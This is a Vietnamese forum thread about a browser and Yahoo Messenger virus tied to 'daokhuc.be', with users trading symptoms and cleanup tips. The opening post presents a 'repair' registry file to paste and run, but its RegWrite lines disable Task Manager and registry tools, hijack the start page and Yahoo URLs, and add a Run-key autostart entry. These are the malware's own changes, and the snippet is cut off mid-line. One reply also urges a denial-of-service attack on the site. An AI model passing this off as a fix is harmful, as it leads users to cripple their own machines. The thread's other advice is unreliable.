Nếu ai bị nhiễm "daokhuc.be" thì tạo file *.reg để xoá nhé

S

style8x

New member
GÂY DỰNG
Bác nào chẳng may vào thằng này, bị nhiễm nó, thì em xin hướng dẫn cách sửa nhé

B1: Tạo 1 file sua.reg.
B2: Copy và Paste nội dụng sau
Sau đó chạy file đó và khởi động lại máy nhé

HTML: 
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1") 
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") 
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1") 
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website) 
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website) 
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website) 
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_
 
Ớ, em vừa mới ấn vào cái link này xong, nó hiện lên 1 site cho nghe nhạc nhưng toàn bài có rồi nên em tắt luôn.

Em dùng FireFox, có cài extension NoScript, đến bây giờ vẫn chưa thấy biểu hiện gì cả. Có cách nào để biết mình bị nhiễm rồi hay chưa ko hả bác ???
 
hehe em cũng rứa.... nghe nhạc đã đời = firefox xong..chất lượng chán quá tệ hơn cả radio của Itune thế là tắt... chẳng thấy biểu hiện gì.... nó là virus gì vậy các bác? biểu hiện bệnh lý ra sao?
 
Em cũng dung firefox lúc click vào nó báo page not found không biết có làm sao không? lần trước cũng thoát vụ funy YM chẳng thấy động tĩnh gì cả. :)
 
Có mấy bạn người bị dính con virut này. Hôm nay bật YM lên thấy họ gửi cho mình cả đống offline toàn những lời ca xến chảy nước trong bài hát khỉ gió nào đấy, phía cuối có đường link dẫn đến trang web. Mình biết đây là 1 dạng virut nên không click vào. Nhưng cũng không biết có cách nào kiểm tra xem mình bị nhiễm hay chưa. Thật đáng ghét! Anh em nào biết cách thì làm quả tấn công từ chối dịch vụ nổ tung cái website này đi nhỉ?!
 
Thế mới biết FF mạnh như thế nào, đặc biệt là thêm NoScript . Viva for FF user :D
 
Kinh nghiệm của tôi là không bao giờ click vào 1 cái link lạ mà bạn bè mình gửi qua IM. Vì như vậy là tự đưa đầu mình vào chỗ chết.
 
thế bác Style8x nói thế nào gọi là link lạ? IM thường bạn bè gửi cho nhau đồ lạ, thế bác phân biệt thế nào là link là và link... quen? :p
 
Nói chung là tuỳ kinh nghiệm thôi, chứ đâu phải cứ đuôi .tk là đểu đâu, hoặc tên file lạ thì có gì là lạ, nhiều khi tôi design website tôi toàn chơi file đặt tên theo kiểu riêng của mình... Nói chung lên net thì cần phải tự bảo vệ mình bằng các chương trình tường lửa, tôi sài Zone alarm để secu ở mức cao, vào thử thằng này nó báo ngay. Chứ bác lướt net mà không có thiết bị bảo vệ thì chẳng khác gì người đeo đầy vàng và cởi truồng đi ra đường, mất là cái chắc. Chẳng lẽ lúc đó lại bảo là hễ gặp người lạ là tao tránh nên không bị cướp à??? hic hic quá sai lầm.

Không phài cứ fire fox là an toàn đâu, chẳng qua các virus bây giờ chủ yếu tấn công IE nên FF không bị gì, cứ chờ xem, rồi sẽ có khối loại virus chỉ ăn FF mà bỏ qua IE đấy.
 
style8x nói:
Chẳng hạn có một ai đó, gửi cho bạn 1 link lạ hoắc
ví dụ : http://tenmien.tk/jjj.php?=ht.jpg thì đúng là 1 cái link lạ rồi
còn nếu là http://www.vnexpress.net/Vietnam/Doi-song/2006/08/3B9ECCE9 thì đương nhiên đó là 1 tờ báo uy tín thì chẳng có ngại ngần gì mà ko click vào.
hoặc 1 link dã man như http://tenmien.com/flash.exe thì chớ có mà vào chết ngay đó trừ khi là http://tenmien.com/flash.swf
Nhấn để mở rộng...

Hehe, bác dùng IE, có ActiveX và Macromedia Flash mà bỏ qua file swf thì theo em bác chuẩn bị cài lại WIn là vừa. IE tự kích hoạt file flash, cũng như file .exe được tự động load về và open vậy :D
 
Nếu ai lỡ bị nhiễm Virus nhut.be , minhnhut.be , Daokhuc.be thì cách loại bỏ như sau :
1. Tắt hết Internet Explorer , Fire Fox đi
2. Vào Internet Explore Option , Fire Fox Option , reset home page, Reset Websetting .
Và vào đây : http://www.bkav.com.vn/frmDownload.aspx để tải bản BKAV mới về để Quét,và Diệt. Sau đó khởi động lại máy tính
3. Download cái này về http://windowsxp.mvps.org/reg/EnableTM.reg rồi chạy. Bấm Start-Run- chạy cái file trên, là xong

Chúc bạn thành công !
 
tôi đã tạo và tai các file *.reg rồi nhưng mà máy báo lỗi " regỉstry editing has been dissabled by your addministrator"và không chạy đựơc, phải làm sao nữa các bạn.
 
paintmanvn nói:
tôi đã tạo và tai các file *.reg rồi nhưng mà máy báo lỗi " regỉstry editing has been dissabled by your addministrator"và không chạy đựơc, phải làm sao nữa các bạn.
Nhấn để mở rộng...

Theo em nghĩ đó có nghĩa là bác đã chạy cái file reg đó trên một acc User chứ ko phải acc toàn quyền admin trên con PC của bác. Nếu có lỡ "bị" con này mà bác lỡ là chủ của acc User thì... hehe chắc phải nhờ bác nào ... làm chủ cái acc "ét-mim" đó làm hộ rùi bác ui.
 
Bạn ơi, bạn phải làm theo hướng dẫn chứ, download cái thằng BKAV về, sau đó quét 1 lượt máy của bạn bằng BKAV, sau đó khởi động lại máy và chạy cái file mà *.reg là xong mà
 
Mình sử dụng máy này 1 mình mà và đang chạy ở chế độ của Admin mà, đâu có đặt pass đâu
 
Bạn chỉ cần làm theo đúng hướng dẫn mình đã hướng dẫn ở trên là được mà, nếu không được thì chat Yahoo với mình: hotrovietnam nhé
 
Cái Bkab đó chẳng quét đuợc con nào cả , dùng McAfee mới phát hiện được nhưng ko xóa đựơc
 
Sao lạ vậy, tôi vẫn thấy ngon lành mà, bản download bản BKAV Pro nhé, tôi dùng đi dùng lại vài lần vẫn thấy hiệu quả mà. Ngon lành 100%
 
Bạn phải đăng nhập hoặc đăng ký để bình luận.
Back
Top